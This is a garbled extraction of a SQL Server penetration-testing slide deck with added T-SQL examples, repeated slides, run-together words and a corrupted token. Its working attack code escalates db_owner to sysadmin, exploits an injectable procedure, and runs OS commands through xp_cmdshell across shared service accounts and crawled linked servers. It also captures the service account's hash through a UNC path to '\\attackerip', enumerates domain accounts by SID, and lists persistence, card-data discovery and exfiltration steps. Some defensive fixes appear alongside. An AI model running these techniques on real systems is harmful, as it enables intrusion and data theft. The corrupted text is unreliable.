bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
2. Get the principal ID for the sa account with "SUSER_ID".
3. Use "SUSER_NAME" to turn a bare principal ID back into a SQL login name.
4. Increment the number and repeat. SUSER_NAME resolves any principal ID for any caller, so this lists logins that the metadata visibility rules would hide from a low-privileged user in sys.server_principals.

select n [id], SUSER_NAME(n) [user_name]
from ( select top 10000 row_number() over(order by t1.number) as N
       from master..spt_values t1 cross join master..spt_values t2) a
where SUSER_NAME(n) is not null

Code gifted from @mobileck. Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7

3. Grab the first 48 hex characters (24 bytes) of the full SID; the remaining 4 bytes are the RID, stored little-endian. In the example below the RID is 512 (0x00000200, written as 00020000), the Domain Admins RID.
   Full SID   = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
   Domain SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
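The SID-based domain enumeration the step above describes, written out in T-SQL as an added example (this is not code from the original deck or from PowerUpSQL). The domain name DEMO and the seed group DEMO\Domain Admins are assumptions; any domain principal SUSER_SID can resolve works as a seed. Only the public role is needed, because SUSER_SID and SUSER_SNAME are callable by every login.

```sql
-- Added example (not from the original deck or PowerUpSQL): enumerate domain accounts
-- through SQL Server by rebuilding SIDs from a known domain SID and resolving them with
-- SUSER_SNAME. Assumed names: domain DEMO, seed group 'DEMO\Domain Admins'.
SET NOCOUNT ON;

-- 1. Resolve a seed principal to its full SID (public can call SUSER_SID).
DECLARE @seed_sid VARBINARY(85) = SUSER_SID('DEMO\Domain Admins');
IF @seed_sid IS NULL
BEGIN
    RAISERROR('Seed principal did not resolve; check the domain name.', 16, 1);
    RETURN;
END

-- 2. The domain SID is everything but the last 4 bytes; those 4 bytes are the RID,
--    stored little-endian (512 = 0x00000200 appears as 00 02 00 00).
DECLARE @domain_sid VARBINARY(85) = SUBSTRING(@seed_sid, 1, DATALENGTH(@seed_sid) - 4);
SELECT @seed_sid AS seed_sid, @domain_sid AS domain_sid;   -- compare with the slide's hex

-- 3. Walk a RID range, append each RID little-endian, and ask the domain what it is.
--    Well-known RIDs: 500 Administrator, 512 Domain Admins, 513 Domain Users;
--    user and computer accounts start at 1000. Keep the range modest: every miss
--    is a lookup against the domain controller.
DECLARE @found TABLE (rid INT, sid VARBINARY(85), account NVARCHAR(256));
DECLARE @rid INT = 500, @max_rid INT = 1500;
DECLARE @be BINARY(4), @sid VARBINARY(85), @name NVARCHAR(256);
WHILE @rid <= @max_rid
BEGIN
    SET @be  = CAST(@rid AS BINARY(4));                          -- big-endian
    SET @sid = @domain_sid + SUBSTRING(@be, 4, 1) + SUBSTRING(@be, 3, 1)
                           + SUBSTRING(@be, 2, 1) + SUBSTRING(@be, 1, 1);  -- reversed to little-endian
    SET @name = SUSER_SNAME(@sid);                               -- NULL when the RID is unused
    IF @name IS NOT NULL
        INSERT INTO @found (rid, sid, account) VALUES (@rid, @sid, @name);
    SET @rid += 1;
END
SELECT rid, account, sid FROM @found ORDER BY rid;
```

The resolved names come back as DOMAIN\name whether or not the account has a SQL login, which is what makes this useful from a foothold that only has public access. Widen @max_rid in steps; on a large domain the interesting user and group RIDs sit well above 1000.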
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login (the database owner)
Pros
• Can execute queries/commands in another user's context
• Limits which commands and queries run in that context
• Don't have to grant IMPERSONATE
Cons
• No granular control over the database owner's privileges
• The DB_OWNER role can EXECUTE AS OWNER of the DB, which is often a sysadmin
• Requires the database to be configured as TRUSTWORTHY for OS command execution (the owner's server-level permissions only apply outside the database when TRUSTWORTHY is ON)
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• EXECUTE AS OWNER can be used to execute a stored procedure as another login
• The DB_OWNER role can impersonate the actual database owner, and SYSADMIN is often the OWNER

USE MyAppDb
GO
CREATE PROCEDURE sp_escalate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'MyAppUser','sysadmin'
GO

Because the procedure runs as the owner, a db_owner such as MyAppUser can create it and then call it to add its own login to sysadmin. sp_addsrvrolemember is a server-level action, so this only succeeds while MyAppDb is TRUSTWORTHY; with TRUSTWORTHY OFF the impersonated owner context is confined to the database.
Escalating Privileges: Impersonation
Stored Procedure and Trigger Creation / Injection Issues
• Use signed procedures instead of EXECUTE AS OWNER
  o Create stored procedure
  o Create a database master key
  o Create a certificate
  o Create a login from the certificate
  o Configure login privileges
  o Sign stored procedure with certificate
  o GRANT EXECUTE to user
Pros
• Can execute queries/commands in another user's context
• Limits which commands and queries run in that context
• Don't have to grant IMPERSONATE
• Granular control over permissions (the certificate login gets only what the procedure needs)
• Database does NOT have to be configured as TRUSTWORTHY for OS command execution
Cons
• Impersonation can be done via SQL injection under specific conditions
• Impersonation can be done via command injection under specific conditions
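The signed-procedure steps above carried through end to end, as an added example (not code from the original deck). The database MyAppDb, application user MyAppUser, certificate name ProcSigningCert, login name ProcSigningLogin and export path C:\Temp are assumptions; the procedure needs VIEW SERVER STATE, and that is the only server-level right the caller gains, and only inside the procedure.

```sql
-- Added example (not from the original deck): the signed-procedure pattern from the
-- steps above. Assumed names: MyAppDb, MyAppUser, ProcSigningCert, ProcSigningLogin,
-- export path C:\Temp. Step numbers follow the slide.
USE MyAppDb;
GO
-- 1. The procedure. Without a signature a low-privileged caller would only see
--    its own session in sys.dm_exec_sessions.
CREATE PROCEDURE dbo.usp_WhoIsConnected
AS
    SELECT session_id, login_name, host_name, program_name
    FROM sys.dm_exec_sessions
    WHERE is_user_process = 1;
GO
-- 2. Database master key; it protects the certificate's private key.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = 'Dmk-P@ssw0rd-Change-Me';
-- 3. Certificate in the application database.
CREATE CERTIFICATE ProcSigningCert WITH SUBJECT = 'Signs dbo.usp_WhoIsConnected';
-- 6. Sign the procedure while the private key is at hand (the slide lists this as step 6).
ADD SIGNATURE TO dbo.usp_WhoIsConnected BY CERTIFICATE ProcSigningCert;
-- Export the public key only; that is all the login in master needs.
BACKUP CERTIFICATE ProcSigningCert TO FILE = 'C:\Temp\ProcSigningCert.cer';
GO
-- 4. Login from the certificate. CREATE LOGIN ... FROM CERTIFICATE needs the
--    certificate to exist in master, so import the public key there.
USE master;
GO
CREATE CERTIFICATE ProcSigningCert FROM FILE = 'C:\Temp\ProcSigningCert.cer';
CREATE LOGIN ProcSigningLogin FROM CERTIFICATE ProcSigningCert;
-- 5. Exactly the server-level permission the procedure needs, nothing more.
GRANT VIEW SERVER STATE TO ProcSigningLogin;
GO
-- 7. Let the application user run it. TRUSTWORTHY can stay OFF on MyAppDb.
USE MyAppDb;
GO
GRANT EXECUTE ON dbo.usp_WhoIsConnected TO MyAppUser;
GO
-- Check: the signature is recorded against the module. ALTER PROCEDURE removes it,
-- so any later change to the procedure has to be followed by a fresh ADD SIGNATURE.
SELECT cp.class_desc, cp.crypt_type_desc, c.name AS certificate_name
FROM sys.crypt_properties AS cp
JOIN sys.certificates AS c ON c.thumbprint = cp.thumbprint
WHERE cp.major_id = OBJECT_ID('dbo.usp_WhoIsConnected');
```

Connected as MyAppUser, a direct SELECT from sys.dm_exec_sessions returns one row and EXEC dbo.usp_WhoIsConnected returns all user sessions. Compare with the sp_escalate_me procedure above: there the caller inherits the whole owner context, here the caller inherits one permission, attached to one module, that disappears the moment the module text changes. On SQL Server 2012 and later the file round trip can be replaced by CERTENCODED()/CERTPRIVATEKEY() and CREATE CERTIFICATE ... FROM BINARY.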
Escalating Privileges: Impersonation
SQL Injection Example

CREATE PROCEDURE sp_sqli2
@DbName varchar(max)
AS
BEGIN
Declare @query as varchar(max)
SET @query = 'SELECT name FROM master..sysdatabases WHERE name like ''%'+ @DbName+'%'' OR name=''tempdb'''
EXECUTE(@query)
END
GO

@DbName is concatenated straight into the dynamic SQL, so the caller controls the statement that EXECUTE runs. On its own that is an injection bug in the caller's own context; inside a procedure that runs as the owner (EXECUTE AS OWNER) or carries a certificate signature, it hands the caller that elevated context.
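An added example (not from the original deck) showing the two sides of the sp_sqli2 procedure above: a call whose argument breaks out of the string literal, and a parameterised rewrite with the same behaviour. The name sp_sqli2_fixed is an assumption.

```sql
-- Added example (not from the original deck): (a) a call that breaks out of the
-- string literal in sp_sqli2 above, and (b) a parameterised rewrite with the same
-- behaviour. sp_sqli2_fixed is an assumed name.

-- (a) The closing quote ends the LIKE pattern, OR 1=1 widens the first statement,
--     the injected SELECT runs as a second statement, and the trailing comment
--     swallows the rest of the original text. If the procedure had been created
--     WITH EXECUTE AS OWNER (or signed), is_sysadmin comes back 1 for an ordinary caller.
EXEC sp_sqli2 @DbName = 'x'' OR 1=1; SELECT SUSER_SNAME() AS running_as, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin; --';

-- (b) Same query with the pattern bound as a parameter: quote characters in
--     @DbName are data, and the caller cannot append statements.
GO
CREATE PROCEDURE sp_sqli2_fixed
    @DbName NVARCHAR(128)
AS
BEGIN
    DECLARE @query   NVARCHAR(MAX) = N'SELECT name FROM master.sys.databases WHERE name LIKE @pattern OR name = N''tempdb''';
    DECLARE @pattern NVARCHAR(130) = N'%' + @DbName + N'%';
    EXEC sp_executesql @query, N'@pattern NVARCHAR(130)', @pattern = @pattern;
END
GO
-- Returns only tempdb: no database name contains the payload text.
EXEC sp_sqli2_fixed @DbName = N'x'' OR 1=1; SELECT SUSER_SNAME(); --';
```

The fix is the same whether or not the procedure impersonates anyone: the query text never changes shape, so the elevated context (if there is one) can only ever run the one statement the author wrote.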
Escalating Privileges: Shared Service Accounts
Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Zones: Internet / DMZ / Intranet. Hosts: an LVA web server (ports 80 and 443), LVA and HVA database servers (ports 1433 and 1434), and ADS. Key: HVA = High Value Application, LVA = Low Value Application. Attack path of "Captain Evil": 1. SQL injection into the LVA; 2. execute a local command via xp_cmdshell; 3. access the HVA with the shared domain service account and execute commands and gather data from other database servers via osql.]
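Steps 2 and 3 of the figure as an added T-SQL example (not code from the original deck). It assumes sysadmin on the first instance and a second instance named HVA-DB01 whose service runs under the same domain account; sqlcmd is used where the figure says osql, with the same -E -S -Q switches.

```sql
-- Added example (not from the original deck): steps 2 and 3 of the figure above.
-- Requires sysadmin on the first instance. HVA-DB01 is an assumed server name.

-- Step 2: a sysadmin turns on xp_cmdshell and runs an OS command. It executes as the
-- SQL Server service account, not as the SQL login that called it.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';             -- e.g. DEMO\svc_sqlserver

-- Step 3: from that context a trusted connection (-E) to another instance arrives as
-- the same domain account. The query reports what that account is over there.
EXEC master..xp_cmdshell
    'sqlcmd -E -S HVA-DB01 -Q "SELECT SYSTEM_USER AS running_as, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin"';

-- Put the configuration back the way it was found.
EXEC sp_configure 'xp_cmdshell', 0;            RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;  RECONFIGURE;
```

The second xp_cmdshell call is the check worth running before assuming point 5 holds. On SQL Server 2012 and later, setup grants sysadmin to the per-service SID (NT SERVICE\MSSQLSERVER) rather than to the domain account, so the account is only sysadmin on the other instance where someone added it as a login explicitly; that is common, but is_sysadmin in the output is what decides it. Where each instance runs under its own gMSA or a virtual account there is no shared identity to ride.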
Escalating Privileges
Crawling SQL Server Links

Escalating Privileges: Crawling SQL Server Links
What's a SQL Server link?
SQL Server links (linked servers) are persistent, pre-configured connections from one SQL Server to another.
Why should I care?
Short answer = privilege escalation
• Any login, including the Public role, can run queries through a link, and the query executes on the remote server as whatever login the link was configured with (effectively impersonation of that login)
  SELECT * FROM OPENQUERY([SQLSERVER2], 'SELECT @@Version')
• Stored procedures can be executed on the remote server (xp_cmdshell) when RPC out is enabled on the link
• Links can be crawled: each remote server may have links of its own
[Figure: Leveraging MS SQL Database Links. Same layout: Internet / DMZ / Intranet, an LVA web server (ports 80 and 443), DB1 (LVA) and HVA database servers (ports 1433 and 1434), and ADS. Key: HVA = High Value Application, LVA = Low Value Application. Attack path of "Captain Evil": 1. SQL injection into the LVA; a DB link configured with least privileges leads to DB1, and a DB link configured with the SA account leads on to the HVA; 2. execute SQL queries and local commands on database servers via nested linked servers.]
Escalating Privileges: Crawling SQL Server Links
Penetration Test Stats
• Database links exist (and can be crawled) in about 50% of environments we've seen
• The max number of hops we've seen is 12
• The max number of servers crawled is 226
Escalating Privileges: Crawling Server Links
Old Script
• Released 2012: https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_linkcrawler
New Functions
• Author: Antti Rantasaari, https://blog.netspi.com/sql-server-link-crawling-powerupsql/

Function                  Description
Get-SQLServerLink         Get a list of SQL Server links on the server
Get-SQLServerLinkCrawl    Crawls linked servers and supports SQL query and OS command execution
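What those two functions do, shown in T-SQL as an added example (not PowerUpSQL's code or the original deck's): an inventory of the links on the current instance and the nested OPENQUERY text a crawl sends to reach a server several hops away. The link names SQLSERVER2 and SQLSERVER3 are assumptions.

```sql
-- Added example (not from the original deck or PowerUpSQL). Part 1 inventories the
-- links on the current instance, the job Get-SQLServerLink does; part 2 builds the
-- nested OPENQUERY text a crawl uses to go more than one hop.
-- Link names SQLSERVER2 and SQLSERVER3 are assumptions.

-- Part 1: links, and which login they run as on the remote side. remote_name = 'sa'
-- with local_login '(all logins)' is the "DB link with SA account" case from the
-- figure: every login here becomes sa over there.
SELECT s.name                 AS link_name,
       s.data_source          AS remote_instance,
       s.provider,
       s.is_data_access_enabled,              -- needed for OPENQUERY
       s.is_rpc_out_enabled,                  -- needed for EXEC (...) AT link, i.e. xp_cmdshell
       CASE WHEN ll.local_principal_id = 0 THEN '(all logins)'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       ll.uses_self_credential,               -- 1 = forward the caller's own Windows identity
       ll.remote_name                         -- fixed remote login, NULL when self-credential
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;

-- Part 2: wrap a query for a path of links. Each level is a string literal inside the
-- level above it, so every single quote doubles at each hop; that growth is why a
-- crawler generates this text instead of someone typing it.
DECLARE @hops TABLE (seq INT PRIMARY KEY, link SYSNAME);
INSERT INTO @hops VALUES (1, 'SQLSERVER2'), (2, 'SQLSERVER3');

DECLARE @q NVARCHAR(MAX) =
    N'SELECT @@SERVERNAME AS reached, SYSTEM_USER AS running_as, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin';
DECLARE @seq INT = (SELECT MAX(seq) FROM @hops);
WHILE @seq >= 1                              -- innermost hop first, hop 1 last
BEGIN
    SELECT @q = N'SELECT * FROM OPENQUERY(' + QUOTENAME(link) + N', '''
              + REPLACE(@q, N'''', N'''''') + N''')'
    FROM @hops WHERE seq = @seq;
    SET @seq -= 1;
END
PRINT @q;                                    -- the statement as sent to SQLSERVER2
EXEC sp_executesql @q;                       -- rows come back from SQLSERVER3

-- Procedures (xp_cmdshell, sp_configure) need the RPC form instead, which the remote
-- side accepts only when is_rpc_out_enabled = 1 for that link:
EXEC ('SELECT SYSTEM_USER AS running_as, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin') AT [SQLSERVER2];
```

Run part 1 on each server the crawl reaches and the path in the figure falls out of the data: a least-privilege link (a fixed low-privileged remote_name, or uses_self_credential = 1) into DB1, then a link with remote_name = 'sa' from DB1 onward. The is_sysadmin column returned by part 2 tells you what you are on the far end before you spend any effort there.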
Escalating Privileges: UNC Path Injection
• The Public role can perform UNC path injection into the BACKUP and RESTORE commands. SQL Server contacts the path before the permission check on the backup fails, so the service account authenticates to the attacker's share even though the command itself is refused:
  BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
  RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
Partial Solution
• A patch was released for SQL Server versions 2012 through 2016: https://technet.microsoft.com/library/security/MS16-131
• There is no fix for SQL Server 2000 to 2008
Escalating Privileges: UNC Path Injection
So in summary...
• The PUBLIC role can capture the SQL Server service account's NetNTLM challenge/response hash by default, by pointing one of these commands at a share it controls; the capture can then be cracked offline or relayed.
But who really has PUBLIC role access?
Oh yeah, a ton of domain users: every Windows user or group login that has been granted CONNECT SQL, and a group login such as BUILTIN\Users or DOMAIN\Domain Users makes that the whole domain.
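The check behind "who really has PUBLIC role access", as an added T-SQL example (not from the original deck or PowerUpSQL). It lists the Windows group logins that turn Public into "every domain user", and anything granted to Public itself beyond the defaults. Run it as a sysadmin or a login with VIEW ANY DEFINITION so the catalog views are complete.

```sql
-- Added example (not from the original deck or PowerUpSQL): find out who "Public"
-- really is on this instance. Run as sysadmin or with VIEW ANY DEFINITION.

-- 1. Windows group logins. A login for BUILTIN\Users, Authenticated Users or
--    DOMAIN\Domain Users means every domain user can connect and therefore sits in
--    Public, with everything that implies for the UNC path issue above.
SELECT sp.name, sp.is_disabled, sp.create_date,
       ISNULL(perm.state_desc, 'not granted') AS connect_sql,
       CASE WHEN sp.name IN ('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')
              OR sp.name LIKE '%\Domain Users'
              OR sp.name LIKE '%\Domain Computers'
            THEN 'everyone in the domain' ELSE 'review membership' END AS exposure
FROM sys.server_principals AS sp
LEFT JOIN sys.server_permissions AS perm
       ON perm.grantee_principal_id = sp.principal_id
      AND perm.type = 'COSQ'                      -- CONNECT SQL
WHERE sp.type = 'G'                               -- Windows group
  AND sp.name NOT LIKE 'NT SERVICE\%'             -- per-service SIDs, not people
ORDER BY exposure, sp.name;

-- 2. Anything granted to Public itself is reachable from every one of those users.
--    The defaults are VIEW ANY DATABASE and CONNECT on the TDS endpoints; any other
--    row here deserves a look.
SELECT perm.class_desc, perm.permission_name, perm.state_desc, perm.major_id
FROM sys.server_permissions AS perm
WHERE perm.grantee_principal_id = (SELECT principal_id FROM sys.server_principals WHERE name = 'public')
  AND NOT (perm.class_desc = 'SERVER'   AND perm.permission_name = 'VIEW ANY DATABASE')
  AND NOT (perm.class_desc = 'ENDPOINT' AND perm.permission_name = 'CONNECT');
```

A group login with state GRANT for CONNECT SQL in the first result is the population that can trigger the BACKUP/RESTORE authentication; the exposure column is a heuristic on the name, so "review membership" rows still need the group expanded in Active Directory.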
Escalating Privileges: UNC Path Injection
DEMO: Get-SQLServiceAccountPwHashes
...what? It's self descriptive.
Escalating Privileges
OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin
Two things to know...
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges

Approach              2000  2005  2008  2012  2014  2016
LSA Secrets            x     x     x     x     x     x
Local Administrator    x     x
LocalSystem            x     x     x
Process Migration      x     x     x     x     x     x
Token Stealing         x     x     x     x     x     x
Single User Mode             x     x     x     x     x

(Local Administrator: BUILTIN\Administrators was a sysadmin login by default through 2005. LocalSystem: NT AUTHORITY\SYSTEM was sysadmin by default through 2008 R2. Single User Mode: from 2005 on, any member of the local Administrators group can connect as sysadmin while the service runs with -m.)

Below are some options for leveraging that knowledge.

Escalating Privileges: OS Admin to SysAdmin
Here are some tool options

Approach                                                       Common Tools
Access as Local Administrator                                  Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                          Psexec, accessibility options, debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets   Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process    Metasploit, Empire, Python, PowerShell, C/C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process     Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                               DBATools
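The check that goes with the table above, as an added T-SQL example (not from the original deck or PowerUpSQL): which of the OS-level identities hold sysadmin on this instance, and which account the service actually runs as. sys.dm_server_services needs VIEW SERVER STATE and exists from SQL Server 2008 R2 SP1 on.

```sql
-- Added example (not from the original deck or PowerUpSQL): which OS-level identities
-- from the table above hold sysadmin here, and what the service runs as.
-- Needs VIEW SERVER STATE for sys.dm_server_services (2008 R2 SP1 and later).

-- The identities the table talks about, and whether each is sysadmin on this instance.
-- BUILTIN\Administrators and NT AUTHORITY\SYSTEM were sysadmin by default on older
-- versions; NT SERVICE\MSSQLSERVER is how 2012+ gives the service its sysadmin rights.
SELECT sp.name, sp.type_desc, sp.is_disabled,
       IS_SRVROLEMEMBER('sysadmin', sp.name) AS is_sysadmin
FROM sys.server_principals AS sp
WHERE sp.type IN ('U', 'G')
  AND (   sp.name IN ('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
       OR sp.name LIKE 'NT SERVICE\%'
       OR sp.name IN (SELECT service_account FROM sys.dm_server_services))
ORDER BY is_sysadmin DESC, sp.name;

-- The account xp_cmdshell and outbound UNC authentication run as. A domain account
-- here, shared across instances, is the "one account to rule them all" case from the
-- shared service accounts section; a virtual account or gMSA is not shared.
SELECT servicename, service_account, status_desc, last_startup_time
FROM sys.dm_server_services;
```

Read the two results together: if the service account row is a domain account and the first query shows no sysadmin login for it, the instance is relying on the per-service SID, and an OS admin still gets sysadmin by running inside the service process (process migration, token stealing) rather than by logging on as that account.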
Common Post Exploitation Activities

Post Exploitation Overview
Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server layer: startup procedures, agent jobs, triggers, modified code
   • OS layer: registry and file auto-runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted (TDE) databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
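Item 2 of the list above in T-SQL, as an added example (not from the original deck or PowerUpSQL): a keyword search over column names, a sample of values through each candidate column, and a Luhn check on the samples. The dbo.DemoCustomers table and its rows are constructed test data; 4111-1111-1111-1111 is a well-known Luhn-valid test number, not a real account.

```sql
-- Added example (not from the original deck or PowerUpSQL): find columns whose names
-- suggest card numbers, sample values through them, keep the ones that pass Luhn.
-- dbo.DemoCustomers and dbo.fn_IsLuhnValid are assumed names; the rows are constructed.

-- Luhn: from the rightmost digit, double every second digit, subtract 9 when the
-- result exceeds 9, and the total must be divisible by 10. Non-digits are skipped so
-- dashes and spaces in the stored value do not hide a match.
CREATE FUNCTION dbo.fn_IsLuhnValid (@s NVARCHAR(32))
RETURNS BIT
AS
BEGIN
    DECLARE @digits NVARCHAR(32) = N'', @i INT = 1;
    WHILE @i <= LEN(@s)
    BEGIN
        IF SUBSTRING(@s, @i, 1) LIKE '[0-9]' SET @digits += SUBSTRING(@s, @i, 1);
        SET @i += 1;
    END
    IF LEN(@digits) < 13 OR LEN(@digits) > 19 RETURN 0;      -- PAN lengths only

    DECLARE @sum INT = 0, @pos INT = LEN(@digits), @double BIT = 0, @d INT;
    WHILE @pos >= 1
    BEGIN
        SET @d = CAST(SUBSTRING(@digits, @pos, 1) AS INT);
        IF @double = 1 SET @d = CASE WHEN @d * 2 > 9 THEN @d * 2 - 9 ELSE @d * 2 END;
        SET @sum += @d;
        SET @double = CASE WHEN @double = 1 THEN 0 ELSE 1 END;
        SET @pos -= 1;
    END
    RETURN CASE WHEN @sum % 10 = 0 THEN 1 ELSE 0 END;
END
GO

-- Constructed sample data.
CREATE TABLE dbo.DemoCustomers (id INT, CardNumber VARCHAR(32), Notes VARCHAR(64));
INSERT INTO dbo.DemoCustomers VALUES
    (1, '4111-1111-1111-1111', 'passes Luhn'),
    (2, '1234 5678 9012 3456', 'fails Luhn'),
    (3, 'n/a',                 'not a number');
GO

-- Keyword search over column names, then a sampled Luhn check per column:
-- one SELECT per candidate column, joined with UNION ALL and run once.
DECLARE @sql NVARCHAR(MAX) = N'';
SELECT @sql += N' UNION ALL SELECT '
             + QUOTENAME(c.TABLE_SCHEMA, '''') + N' AS schema_name, '
             + QUOTENAME(c.TABLE_NAME,   '''') + N' AS table_name, '
             + QUOTENAME(c.COLUMN_NAME,  '''') + N' AS column_name, v.val AS sample_value'
             + N' FROM (SELECT TOP (20) CAST(' + QUOTENAME(c.COLUMN_NAME) + N' AS NVARCHAR(32)) AS val FROM '
             + QUOTENAME(c.TABLE_SCHEMA) + N'.' + QUOTENAME(c.TABLE_NAME) + N') AS v'
             + N' WHERE dbo.fn_IsLuhnValid(v.val) = 1'
FROM INFORMATION_SCHEMA.COLUMNS AS c
JOIN INFORMATION_SCHEMA.TABLES  AS t
  ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
WHERE t.TABLE_TYPE = 'BASE TABLE'
  AND (c.COLUMN_NAME LI▁KE '%card%' OR c.COLUMN_NAME LIKE '%ccn%' OR c.COLUMN_NAME LIKE '%pan%')
  AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar', 'bigint', 'numeric', 'decimal');

IF LEN(@sql) > 0
BEGIN
    SET @sql = STUFF(@sql, 1, 11, N'');     -- drop the leading ' UNION ALL '
    EXEC sp_executesql @sql;                -- dbo.DemoCustomers.CardNumber: 4111-1111-1111-1111
END
```

Against the constructed table only the Luhn-valid row comes back; the "fails Luhn" value has a card-shaped column name but does not check out, which is the whole point of sampling data rather than trusting names. The keyword list and TOP (20) sample size are the knobs to widen on a real target; a keyword like "pan" will also match unrelated column names, so treat a hit as a lead, not a finding.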
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
